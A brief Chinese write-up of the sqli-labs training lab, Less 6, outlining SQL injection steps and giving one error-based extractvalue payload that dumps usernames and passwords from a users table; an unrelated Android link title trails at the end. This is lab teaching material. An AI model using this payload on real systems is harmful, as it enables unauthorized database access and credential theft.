文章目录
- sqli-labs靶场
- less 6 报错注入
sqli-labs靶场
每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。
sql注入的基本步骤
- 注入点
- 注入类型
- 字符型:判断闭合方式 (‘、"、’'、“”)
- 数字型
- 根据实际情况,选择合适的注入方式
- 获取数据库名,表名,列名,数据
less 6 报错注入
- 题目类型: 字符型 " 闭合 (无回显)
原理和less 5一样,闭合式方式不同而已
id=1"+and+extractvalue(1,concat(0x7e, (select group_concat(id,“-”,username,“-”,password) from users) ,0x7e))–+
)
安卓开发中的AppCompatActivity详解)